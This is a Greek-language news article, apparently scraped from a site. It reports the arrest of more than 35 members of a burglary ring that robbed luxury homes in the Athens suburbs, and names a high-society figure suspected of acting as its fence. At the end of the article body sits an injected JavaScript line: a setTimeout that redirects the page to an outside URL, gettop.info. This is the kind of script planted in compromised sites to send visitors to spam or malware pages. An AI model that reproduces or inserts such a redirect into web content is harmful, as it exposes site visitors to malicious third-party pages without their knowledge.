Αθηναίος της υψηλής κοινωνίας μέλος της σπείρας που λήστευαν σπίτια στα βόρεια προάστια

0
24

 

Μέσα στην απόλυτη χλιδή ζούσε το δαιδαλώδες κύκλωμα των Ρομά που εξάρθρωσε η Αστυνομία συλλαμβάνοντας περισσότερα από 35 άτομα ανάμεσα τους και τα δέκα μεγάλα κεφάλια των δύο ομάδων. Οι συλληφθέντες, που οδηγούνται το απόγευμα στον εισαγγελέα πραγματοποίησαν τα τελευταία χρόνια σχεδόν τις μισές διαρρήξεις σε πολυτελείς κατοικίες σε όλη τη χώρα και ανάμεσα στα θύματα τους ήταν πολλοί διάσημοι όπως η Αννα Βίσση.

Για τις μετακινήσεις τους χρησιμοποιούσαν super cars εκατοντάδων χιλιάδων ευρώ, όπως Ferrari, Porsche Cayenne και άλλα θηριώδη SUV. Μάλιστα σύμφωνα με πληροφορίες, οι εγκέφαλοι κυκλοφορούσαν με Ferrari και είχαν τις Πόρσε για τους… βοηθούς, όπως γράφει το protothema, που επιπλέον αποκαλύπτει πως ένας γνωστός μπον βιβέρ της Αθήνας, είναι ανάμεσα στους 37 συλληφθέντες της μεγάλης σπείρας που δρούσε στην Αττική και είχε στο στόχαστρο διασημότητες.

https://www.youtube.com/watch?v=MZAz73G8S2k

Ο συλληφθείς, είναι γνωστός στην υψηλή κοινωνία για τις χιλιάδες ευρώ που σκορπάει σε νυχτερινά μαγαζιά καθώς και σε ακριβά αυτοκίνητα, ενώ έχει απασχολήσει την κοινή γνώμη για τις θυελλώδης σχέσεις του με καλλίγραμμα μοντέλα.

Μάλιστα, ο συγκεκριμένος φέρεται να ήταν κλεπταποδόχος των μελών της σπείρας, ενώ οι Αρχές εξετάζουν το ενδεχόμενο να αποτελεί τον πληροφοριοδότη ο οποίος παρείχε λεπτομέρειες για τα χτυπήματα στα σπίτια των διασήμων. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here